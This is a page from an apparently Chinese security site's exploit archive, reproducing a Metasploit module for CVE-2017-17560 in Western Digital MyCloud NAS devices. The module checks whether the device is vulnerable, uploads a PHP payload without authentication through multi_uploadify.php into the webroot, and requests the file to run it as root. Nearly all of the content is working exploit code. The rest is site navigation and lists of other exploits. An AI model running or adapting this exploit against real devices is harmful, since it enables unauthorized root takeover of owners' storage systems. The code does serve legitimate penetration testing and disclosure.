首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Western Digital MyCloud multi_uploadify File Upload
来源:metasploit.com 作者:Zenofex 发布时间:2017-12-18  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  HttpFingerprint = { :method => 'HEAD', :uri => '/web/', :pattern => [/Apache/] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Western Digital MyCloud multi_uploadify File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a file upload vulnerability found in Western Digital's MyCloud
        NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php
        PHP script provides multipart upload functionality that is accessible without authentication
        and can be used to place a file anywhere on the device's file system. This allows an
        attacker the ability to upload a PHP shell onto the device and obtain arbitrary code
        execution as root.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Zenofex <zenofex[at]exploitee.rs>' # Initial vulnerability discovery, PoC, and Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29'],
          ['URL', 'https://download.exploitee.rs/file/generic/Exploiteers-DEFCON25.pdf'],
          ['URL', 'https://www.youtube.com/watch?v=EO_49pfmA5A'],
          ['CVE', '2017-17560']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Automatic Targeting', { 'auto' => true }]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 29 2017',
      'DefaultTarget'  => 0))
  end

  def check
    res = send_request_cgi('uri' => '/web/jquery/uploader/multi_uploadify.php')

    if res.nil?
      vprint_error('Connection failed')
      return CheckCode::Unknown
    end

    if res.code == 302 && res.headers['Location'] =~ /\?status=1/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end

  def upload(web_folder, fname, file)
    # construct post data
    data = Rex::MIME::Message.new
    data.add_part(file, 'application/x-php', nil, "form-data; name=\"Filedata[]\"; filename=\"#{fname}\"")

    # upload
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => '/web/jquery/uploader/multi_uploadify.php',
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s,
      'vars_get' => {
        'folder' => web_folder
      }
    })
  end

  def exploit
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, 'Target does not appear to be a vulnerable Western Digital MyCloud device')
    end

    # upload PHP payload to '/var/www' (webroot).
    web_folder = '/var/www'
    php   = "<?php #{payload.encoded} ?>"
    print_status("Uploading PHP payload (#{php.length} bytes) to '#{web_folder}'.")
    fname = ".#{rand_text_alphanumeric(rand(10) + 6)}.php"

    res = upload(web_folder, fname, php)

    # check upload response
    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
    if res.code != 302 || res.headers['Location'] =~ /\?status=0/
      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
    end
    print_good('Uploaded PHP payload successfully.')

    # register uploaded php payload file for cleanup
    register_files_for_cleanup(fname)

    # retrieve and execute PHP payload
    print_status("Making request for '/#{fname}' to execute payload.")
    res = send_request_cgi({'uri' => normalize_uri(fname)}, 15)
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Office DDE Payload D
·ITGuard-Manager 0.0.0.1 - Remo
·Dup Scout Enterprise 10.0.18 B
·Sync Breeze 10.2.12 - Denial o
·Advantech WebAccess 8.2 Stack
·Linux kernel < 4.10.15 - Race
·pfSense 2.4.1 CSRF Error Page
·CDex 1.96 - Buffer Overflow
·glibc ld.so - Memory Leak / Bu
·Outlook for Android - Attachme
·macOS/iOS - Kernel Double Free
·GoAhead httpd 2.5 < 3.6.5 - 'L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved